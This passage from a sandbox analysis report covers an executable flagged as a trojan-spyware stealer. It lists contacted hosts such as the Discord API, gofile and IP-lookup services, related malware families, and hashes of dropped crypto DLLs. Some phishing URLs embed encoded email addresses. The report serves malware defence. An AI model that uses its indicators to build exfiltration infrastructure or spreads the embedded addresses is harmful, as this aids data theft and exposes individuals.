00000001.00000003.291517549.0000022127FBE000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.278987782.00000221280C9000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.291740769.0000022127D4B000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280259713.0000022127D17000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280797584.0000022127F96000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287059855.0000022127F9A000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274505409.0000022127E8F000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275572297.0000022127E92000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://discordapp.com/api/v6/users/	KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Ousret/charset_normalizer	KzqQe0QtRd.exe, 00000001.00000003.292085021.0000022127372000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.firmaprofesional.com/cps0	KzqQe0QtRd.exe, 00000001.00000003.282830555.0000022127316000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287215790.000002212731F000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275123747.0000022128261000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279603095.0000022127315000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275507020.0000022127D17000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274037480.00000221281D7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280259713.0000022127D17000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000002.297991676.000002212732C000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.289758407.0000022127329000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274102089.00000221281FF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.292497795.000002212732C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tidelift.com/subscription/pkg/pypi-setuptools?utm_source=pypi-setuptools&utm_medium=referral	KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/re.html#re.sub	KzqQe0QtRd.exe, 00000001.00000002.298654222.0000022127760000.00000004.00001000.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
162.159.136.232	unknown	United States	13335	CLOUDFLARENETUS	false
162.159.137.232	ptb.discord.com	United States	13335	CLOUDFLARENETUS	false
51.178.66.33	unknown	France	16276	OVHFR	false
64.185.227.156	unknown	United States	18450	WEBNXUS	false
159.89.102.253	geolocation-db.com	United States	14061	DIGITALOCEAN-ASNUS	false
162.159.135.232	unknown	United States	13335	CLOUDFLARENETUS	false
173.231.16.76	api4.ipify.org	United States	18450	WEBNXUS	false
51.38.43.18	api.gofile.io	France	16276	OVHFR	false

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1305930
Start date and time:	2023-09-08 07:30:14 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	KzqQe0QtRd.exe
Original Sample Name:	7fe90dcf5c49fd85ce12939b8cc3315c.exe
Detection:	MAL
Classification:	mal72.troj.spyw.winEXE@6/80@14/8
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 42 Number of non-executed functions: 69
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): kv601.prod.do.dsp.mp.microsoft.com, geover.prod.do.dsp.mp.microsoft.com, fs.microsoft.com, geo.prod.do.dsp.mp.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
162.159.136.232	BFdDLHONGH.exe	Get hash	malicious	AgentTesla	Browse
	E-DEKONT1,DOC.exe	Get hash	malicious	AgentTesla	Browse
	EL3MgXmFGp.exe	Get hash	malicious	AgentTesla	Browse
	DHL_Express_28015809822.exe	Get hash	malicious	AgentTesla	Browse
	#U00d6deme_#U0130#U00e7in_Proforma_Fatura.exe	Get hash	malicious	AgentTesla	Browse
	wZDeMCqksv.exe	Get hash	malicious	Discord Token Stealer	Browse
	Halkbank_Ekstre_20230426_075819_154055.exe	Get hash	malicious	AgentTesla	Browse
	rozineni.exe	Get hash	malicious	Creal Stealer	Browse
	FedEx_AWB#50253274643.exe	Get hash	malicious	AgentTesla	Browse
	e-dekont.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Win32.PWSX-gen.19137.8960.exe	Get hash	malicious	AgentTesla	Browse
	FedEx_AWB#503573277643.exe	Get hash	malicious	AgentTesla	Browse
	e-dekont.exe	Get hash	malicious	AgentTesla	Browse
	e-dekont.exe	Get hash	malicious	AgentTesla	Browse
	A#U011fustos_Sat#U0131n_Alma_Sipari#U015fi-081723.exe	Get hash	malicious	AgentTesla	Browse
	Ziraat_Bankas#U0131_Swift_Mesaji.exe	Get hash	malicious	AgentTesla	Browse
	z46eKpNczsvsrg2wHR.exe	Get hash	malicious	AgentTesla	Browse
	e-dekont.exe	Get hash	malicious	AgentTesla	Browse
	e-dekont.exe	Get hash	malicious	AgentTesla	Browse
	LpBTMoSyyx.exe	Get hash	malicious	AsyncRAT, DarkTortilla, StormKitty	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api4.ipify.org	SecuriteInfo.com.Win32.TrojanX-gen.11530.1442.exe	Get hash	malicious	AgentTesla	Browse	64.185.227.156
	https://r20.rs6.net/tn.jsp?f=001ufeRPKBUNJOknPgK4Ctl-2CHzyxlzChpTEhOBujYE0OUYjTUZxb65gwOBeq9LNgAUkqZssh-s2MlkqQYYkkkJbdUJiB0vZkvP5Wv3mutQfDuckXOLKsNC9n0Xx6CRtucTMMDKf8q3xVqMLbPU4yVq2WaXTvhqVUt&c=7kTYdGZIm1dRziR1jCVhUWIcyDu_26FXgUNlyAMytgWiEqB77AK3pQ==&ch=-4ZH1TFoMQ4NLYDqy295NGpvbnr8nfgSCe0_GG7QGnKt8SGfU2o-NA==&__=ZGxldnlAd3lud2FyZC5jb20=	Get hash	malicious	HTMLPhisher	Browse	104.237.62.212
	QcCjhzamSI.exe	Get hash	malicious	AgentTesla	Browse	173.231.16.76
	VNw2AP5Tj2.exe	Get hash	malicious	AgentTesla	Browse	104.237.62.212
	https://www.linkedin.com/slink/?code=euCi5VBx#and1QHd5bndhcmQuY29t	Get hash	malicious	HTMLPhisher	Browse	104.237.62.212
	SecuriteInfo.com.Win32.PWSX-gen.19939.26903.exe	Get hash	malicious	AgentTesla	Browse	64.185.227.156
	New_Purchase_Order.xlsm	Get hash	malicious	AgentTesla, NSISDropper	Browse	64.185.227.156
	#U00f3rdenes_pendientes________pdf.exe	Get hash	malicious	AgentTesla	Browse	104.237.62.212
	xCIsKJA2z8.exe	Get hash	malicious	AgentTesla	Browse	104.237.62.212
	at1bhqSn5F.exe	Get hash	malicious	AgentTesla	Browse	104.237.62.212
	https://r20.rs6.net/tn.jsp?f=0010Hb9AtHzYDDTbKv8idad1HYXJm9TnI69yRRh_yJlYMyZqen7V2vw5Vew71_EUAszCpmRzmytac9Ny5WpMEK6M9a3fX5MNJtBTQe8Q6Vhy7u7D8FNwX1lel_pbBS2--vWg9t9KpRjY1YokhVGY37JuYTh4vA2v42B&c=I1qlIb0kBtQc8SViF-8_1iefUYHYViQBmB43ZK4LvlLg7lOz0iFFFA==&ch=Ow7_Sk1o_uHMhxNIEokjegODrBrGZBxx36TIKMZJaYQ8E62tWrYtGA==&__=c2x1a2Fjc0B3eW53YXJkLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	173.231.16.76
	3Tzm9pGIDj.exe	Get hash	malicious	AgentTesla	Browse	64.185.227.156
	2859531946.exe	Get hash	malicious	AgentTesla	Browse	173.231.16.76
	D0mw1vNLhV.exe	Get hash	malicious	AgentTesla	Browse	104.237.62.212
	Quotation.PDF.exe	Get hash	malicious	AgentTesla	Browse	64.185.227.156
	XpXJvfwBgE.exe	Get hash	malicious	AgentTesla	Browse	104.237.62.212
	Jb9KLc3Qg6.exe	Get hash	malicious	AgentTesla	Browse	104.237.62.212
	ybWWIxmktc.exe	Get hash	malicious	AgentTesla	Browse	104.237.62.212
	https://r20.rs6.net/tn.jsp?f=0010Hb9AtHzYDDTbKv8idad1HYXJm9TnI69yRRh_yJlYMyZqen7V2vw5Vew71_EUAszCpmRzmytac9Ny5WpMEK6M9a3fX5MNJtBTQe8Q6Vhy7u7D8FNwX1lel_pbBS2--vWg9t9KpRjY1YokhVGY37JuYTh4vA2v42B&c=I1qlIb0kBtQc8SViF-8_1iefUYHYViQBmB43ZK4LvlLg7lOz0iFFFA==&ch=Ow7_Sk1o_uHMhxNIEokjegODrBrGZBxx36TIKMZJaYQ8E62tWrYtGA==&__=Y21hbmRhdG9AbG9ja3Rvbi5jb20=	Get hash	malicious	HTMLPhisher	Browse	64.185.227.156
	OW2QFUVelB.rtf	Get hash	malicious	AgentTesla	Browse	104.237.62.212
ptb.discord.com	PAP46E1UkZ.exe	Get hash	malicious	Unknown	Browse	162.159.128.233
	A4AxThCBqS.exe	Get hash	malicious	Nanocore, Luna Logger, Umbral Stealer	Browse	162.159.136.232
	SecuriteInfo.com.Variant.Jatif.7130.11703.17675.exe	Get hash	malicious	CKS Stealer, Spark RAT	Browse	162.159.137.232
	SecuriteInfo.com.Variant.Jatif.7130.11703.17675.exe	Get hash	malicious	CKS Stealer, Spark RAT	Browse	162.159.138.232
	Lunar_Builder.exe	Get hash	malicious	ItroublveBOT Stealer	Browse	162.159.138.232
	v5u7AiCLzw.exe	Get hash	malicious	NitroRansomware	Browse	162.159.138.232
	NPHzyKe1zJ.exe	Get hash	malicious	NitroRansomware	Browse	162.159.137.232
	ONtIB38CQZ.exe	Get hash	malicious	Unknown	Browse	162.159.128.233
	t5UFndKp9h.exe	Get hash	malicious	NitroRansomware	Browse	162.159.128.233

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	SmokeLoader	Browse	172.67.171.76
	http://track.tychon.bid/proceed.php?domain%5C=...RyZXNzIjoiMTYzLjExNi4yMDIuMjgiLCJ0eXBlIjoiamF2YV9yZWRpcmVjdCIsImJpZCI6IjAuMDQyIn0%5C=	Get hash	malicious	Unknown	Browse	104.21.38.176
	VM Recording 02_30secs_Play.htm	Get hash	malicious	Phisher	Browse	172.67.166.249
	https://agfuse.com/track/og_url?target-url=https://newforcafe.com/Tsue.mendham@wnswphn.org.au	Get hash	malicious	Unknown	Browse	104.16.123.96
	Pterion.exe	Get hash	malicious	Azorult, GuLoader	Browse	172.67.188.254
	file.exe	Get hash	malicious	Unknown	Browse	172.67.166.109
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, RedLine, SmokeLoader	Browse	172.67.181.144
	SongHong_BankSlip+Statement.pdf.exe	Get hash	malicious	Lokibot	Browse	172.67.166.54
	file.exe	Get hash	malicious	Unknown	Browse	172.67.166.109
	file.exe	Get hash	malicious	SmokeLoader	Browse	104.21.29.36
	https://ramcoorp.co/Mjliepe@csu.org	Get hash	malicious	HTMLPhisher	Browse	104.17.3.184
	https://ramcoorp.co/Mjliepe@csu.org	Get hash	malicious	Unknown	Browse	104.17.2.184
	https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwiXkrLy55aBAxXVTaQEHZ5lBMMQFnoECA0QAQ&url=https%3A%2F%2Fservingagain.com%2Fmission-vision-values%2F&usg=AOvVaw1mOUel1ZFfnB7XRyG9B8zR&opi=89978449	Get hash	malicious	Unknown	Browse	104.17.25.14
	VIRUS_stub_ro_crasher.exe	Get hash	malicious	Blank Grabber	Browse	162.159.129.233
	OBS-Studio.exe	Get hash	malicious	Mars Stealer, Vidar	Browse	104.26.10.89
	Builded.exe	Get hash	malicious	Mars Stealer, Vidar	Browse	172.67.69.96
	Tutanota.exe	Get hash	malicious	Mars Stealer, Vidar	Browse	104.26.11.89
	Electrum.exe	Get hash	malicious	Mars Stealer, Vidar	Browse	104.26.11.89
	comprobante.PDF.js	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	XdghEZF9GO.exe	Get hash	malicious	FormBook	Browse	104.21.46.30

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_ARC4.pyd	rozineni.exe	Get hash	malicious	Creal Stealer	Browse
	RN2ZDnNaVx.exe	Get hash	malicious	Blank Grabber, XWorm	Browse
	9TEBRmxRIN.exe	Get hash	malicious	Amadey, RedLine, XWorm	Browse
	im39RVjAx5.exe	Get hash	malicious	AsyncRAT, DcRat	Browse
	WCzx2YwPoy.exe	Get hash	malicious	AsyncRAT, DcRat	Browse
	FileDecrypter.exe	Get hash	malicious	Creal Stealer	Browse
	CrashHandler2.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_ARC4.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	4.690637232215493
Encrypted:	false
SSDEEP:	96:XU9VD9daQ2iTrqT+y/ThvQ0I1uLfcC75JiC4Rs89EcYyGDnM0OcX6gY/7ECFV:S9damqT3ThITst0E5DnKcqgY/79X
MD5:	B8CE6246C867FA4D9A97C8C0ABD86162
SHA1:	8EDFDE5235A7DF73B339E27B69F6350A18085419
SHA-256:	3BFCEEF9B2A31336876A2A6BE63891FDA68BA30AC37EFCB94A4CED10A6E6C23D
SHA-512:	C8C10CBD6640A38351536AFC1C56795FCA1335243EE9B20F8D99B5F1F610B71465CAC45E0628C4438756CED9940EA49A9DB9EB331E6B0FB086CB9FEF3E33CA59
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: rozineni.exe, Detection: malicious, Browse Filename: RN2ZDnNaVx.exe, Detection: malicious, Browse Filename: 9TEBRmxRIN.exe, Detection: malicious, Browse Filename: im39RVjAx5.exe, Detection: malicious, Browse Filename: WCzx2YwPoy.exe, Detection: malicious, Browse Filename: FileDecrypter.exe, Detection: malicious, Browse Filename: CrashHandler2.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.&...H...H...H.......H.I.I...H.M.I...H...I.#.H.I.M...H.I.L...H.I.K...H..@...H..H...H......H..J...H.Rich..H.................PE..d....Ded.........." ..."............P........................................p............`.........................................P(.......(..d....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata..,.... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......(..............@..@.reloc..,....`.......*..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_Salsa20.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13824
Entropy (8bit):	5.043023051517476
Encrypted:	false
SSDEEP:	192:SF/1nb2eqCQtkluknuz4ceS4QDuBA7cqgYvEP:o2P6luLtn4QDKmgYvEP
MD5:	E598D24941E68620AEF43723B239E1C5
SHA1:	FA3C711AA55A700E2D5421F5F73A50662A9CC443
SHA-256:	E63D4123D894B61E0242D53813307FA1FF3B7B60818827520F7FF20CABCD8904
SHA-512:	904E04FB28CFFA2890C0CB4F1169A7CC830224740F0DF3DA622AC2EB9B8F8BDBB4DE88836E40A0126BE0EB3E5131A8D8B5AAACD782D1C5875A2FBBC939F78D5B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.EY.p+..p+..p+......p+.A...p+.E...p+..p*.+p+.A....p+.A./..p+.A.(..p+...#..p+...+..p+......p+...)..p+.Rich.p+.........PE..d....Ded.........." ..."............P.....................................................`..........................................8.......9..d....`.......P..L............p..,....3...............................1..@............0...............................text...h........................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata..L....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_chacha20.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13312
Entropy (8bit):	5.0459062620434185
Encrypted:	false
SSDEEP:	192:7XF/1nb2eqCQtkXnFYIrWjz0YgWDbu5Ko0vdvZt49lkVcqgYvEMN:L2P6XTr0zXgWDbun0vdvZt49MgYvEMN
MD5:	5CAD133D9824EBFAAAF6C23FD7117775
SHA1:	C327CF3FD0F949B05C11D5447C2615C37A884E68
SHA-256:	B80E579CEB9902DE24B6B0794D9169B0248C01FD539003F21E92655920EBA461
SHA-512:	567E8D5FFD9CD3ECDC28E797E2A12350C607F6F1BC26C78F1B4AA50EC3833A53ECBA309D34CBEA145CA4A569EC15F1EAB4889059BAE6C2D890F0D641F3FDA423
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.EY.p+..p+..p+......p+.A...p+.E...p+..p.+p+.A....p+.A./..p+.A.(..p+...#..p+...+..p+......p+...)..p+.Rich.p+.........PE..d....Ded.........." ..."............P.....................................................`..........................................8.......9..d....`.......P..d............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.....................@....pdata..d....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_pkcs1_decode.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12800
Entropy (8bit):	5.102755604487633
Encrypted:	false
SSDEEP:	96:sBMF1siKeai1dqmJo0qVVLf/+NJSC6sc9kJ9oPobXXXP4IIYOxDm+8jcX6gRth2h:sssiHfq5poUkJ97zIDm+ucqgRvE
MD5:	2C138D64B80F7C42123CCD0F03C30D30
SHA1:	1F0DE4930E426F8F4F364C0F16F4A5BAA139EF85
SHA-256:	C3C09625B79A279EDA4907085FC15239DB14BE8E54B38D1FE9FA28F3DE29F2D8
SHA-512:	8CCC621ADDA48F059915315B98D9DA39F1C8BB561A7438BC4E0A3B5CAD8586D79DC7A9F71FC81133C294EF0125249D4546DF790C5AF8DC61466914E56562BE9D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.....h...h...h.......h.I.i...h.M.i...h...i. .h.I.m...h.I.l...h.I.k...h..`...h..h...h......h..j...h.Rich..h.........................PE..d....Ded.........." ..."............P.....................................................`.........................................P8..p....8..d....`.......P...............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...h....@.......*..............@....pdata.......P.......,..............@..@.rsrc........`......................@..@.reloc..,....p.......0..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_aes.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	6.5538426720189396
Encrypted:	false
SSDEEP:	384:3f+7nYpPMedFDlDchrVX1mEVmT9ZgkoD/PKDkGuF0U390QOo8VdbKBWmuvLg4HPy:PqWB7YJlmLJ3oD/S4j990th9VvsC
MD5:	ABBE9B2424566E107CB05D0DDA0AA636
SHA1:	C75E54FEB76CF8BEB7B6818840B11CE649FBCAA8
SHA-256:	C438DD66FA669430CCE11B2ACB7DC0EE72B7953B07013FDA6BF6B803C2C961F9
SHA-512:	743C48D380BF5F03ECED639D35A5500CACD170942450415C3E822BFE368D90F75339CC64AC58766858FC7250618DEE699705AAC12B3C3657951528CDD32C8C1C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.&...H...H...H.......H.I.I...H.M.I...H...I.#.H.I.M...H.I.L...H.I.K...H..@...H..H...H......H..J...H.Rich..H.................PE..d....Ded.........." ...".H...H......P.....................................................`.................................................,...d...............................4... ...................................@............`...............................text....F.......H.................. ..`.rdata..d6...`...8...L..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_aesni.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	5.285321423775064
Encrypted:	false
SSDEEP:	192:wJBjJPqZkEPYinXKccxrEWx4xLquhS3WQ67EIfD4d1ccqgwYUMvEW:iURwin7mrEYCLEGd7/fDawgwYUMvE
MD5:	DD3143D155A6D8A1C9F12CAE6E86484A
SHA1:	271FA34F16F727A73D552B04BDE8BDA8786A81F7
SHA-256:	90ED3206CA3D7248B5152B500A9D48BD55E1D178AED26214CE351090342260D1
SHA-512:	9DAEF75B99996F1C9A22E7C2339259AE955716DD5CC3ECC1D46BA8E28289843BF32AD0E498EF5969F35B1580C6B3434859B6CB940A0857D5C3598979686646EB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.eX.p...p...p.......p..A....p..E....p...p..&p..A....p..A....p..A....p.......p.......p.......p.......p..Rich.p..................PE..d....Ded.........." ...". ... ......P.....................................................`..........................................9......D:..d....`.......P...............p..,....3...............................1..@............0.. ............................text............ .................. ..`.rdata.......0.......$..............@..@.data...(....@.......4..............@....pdata.......P.......6..............@..@.rsrc........`.......:..............@..@.reloc..,....p.......<..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_arc2.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	5.557993803224176
Encrypted:	false
SSDEEP:	192:cDd9Vk3yQ5f8vjVKChhXoJDkq6NS7oE2DDFlWw2XpmdcqgwNeecBU8:6k/5cj4shXED+o2DU8zgwNeO8
MD5:	9CE1EC6C375848D729C99AA19B04AC4A
SHA1:	7ACB90A990494C68BD5A5FB110129FE599F1B9CD
SHA-256:	119ED08B30A011FB067BE66BAD5CA7BE9910632583AB0C723ED770A38DD99212
SHA-512:	405D5DD1CFEBAAA7C81109B18AF43E14B93343D01975281578A709ECABAC3BBC4E035BCC0B0FD4A6DF43FCDE70BA068196BB23BD99E5BFFC2051757AF26EEB6F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.EY.p+..p+..p+......p+.A...p+.E...p+..p*.+p+.A....p+.A./..p+.A.(..p+...#..p+...+..p+......p+...)..p+.Rich.p+.........PE..d....Ded.........." ..."."... ......P.....................................................`.........................................0J.......J..d....p.......`..................,....C...............................B..@............@...............................text....!.......".................. ..`.rdata.......@.......&..............@..@.data...8....P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..,............>..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_blowfish.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20992
Entropy (8bit):	6.056964397165702
Encrypted:	false
SSDEEP:	384:bU/5cJMOZA0nmwBD+XpJgLa0Mp8Qsg4P2llyM:kK1XBD+DgLa1JTi
MD5:	1FCEB547460EC657A43E35F956EF3BCD
SHA1:	14386D7139EFBED85BC548ED5BBE7D2A50C79788
SHA-256:	2F37FB0A2D2423AC5B5646AE35EA9492E7BF03B51A9760054228C97F2F2F048D
SHA-512:	353400B59C1BF0C259470CDE22E5CE56C08608CA63DF5226E7A79ACCFCCC7BC429EDD595A0883987845BB9365C963A916D12FFFA070CF62B4BB9D8C6DC8D6BF5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.EY.p+..p+..p+......p+.A...p+.E...p+..p*.+p+.A....p+.A./..p+.A.(..p+...#..p+...+..p+......p+...)..p+.Rich.p+.........PE..d....Ded.........." ...".$...0......P.....................................................`.........................................pY.......Z..d............p..................4...@S...............................R..@............@...............................text....".......$.................. ..`.rdata..L....@... ...(..............@..@.data...8....`.......H..............@....pdata.......p.......J..............@..@.rsrc................N..............@..@.reloc..4............P..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_cast.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	25088
Entropy (8bit):	6.454615731241598
Encrypted:	false
SSDEEP:	384:5caHLHH4o07ZXmrfXA+UA10ol31tuXyyi/7gLWi:KaHLH4o0NXmrXA+NNxWi7/8LWi
MD5:	92FE77E205F6DB73E0676081E95340B0
SHA1:	529EAB5A5B9CB4782881EEB0E1CC622E8AB7081E
SHA-256:	46BA53DEB7E77D5BD5A384ACDF5BFB01814892236F98390EC9A6717F98760CFE
SHA-512:	4F55E61979D329FD2D98D873736B93E0F84EFB6E017C8B1DDB446A175EEF9195D953CF030A8286574D4E972F54DF715475583B13EBBA34CF0803A6B16A846DBC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.EY.p+..p+..p+......p+.A...p+.E...p+..p*.+p+.A....p+.A./..p+.A.(..p+...#..p+...+..p+......p+...)..p+.Rich.p+.........PE..d....Ded.........." ...".$...@............................................................`.........................................@i.......i..d...............................4....b...............................a..@............@...............................text....".......$.................. ..`.rdata.......@...0...(..............@..@.data...8....p.......X..............@....pdata...............Z..............@..@.rsrc................^..............@..@.reloc..4............`..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_cbc.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.737934511632203
Encrypted:	false
SSDEEP:	192:8F/1nb2eqCQtkrKnlPI12D00acqgYvEn:W2P6KlPe2DIgYvEn
MD5:	FF2C1C4A7AE46C12EB3963F508DAD30F
SHA1:	4D759C143F78A4FE1576238587230ACDF68D9C8C
SHA-256:	73CF4155DF136DB24C2240E8DB0C76BEDCBB721E910558512D6008ADAF7EED50
SHA-512:	453EF9EED028AE172D4B76B25279AD56F59291BE19EB918DE40DB703EC31CDDF60DCE2E40003DFD1EA20EC37E03DF9EF049F0A004486CC23DB8C5A6B6A860E7B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
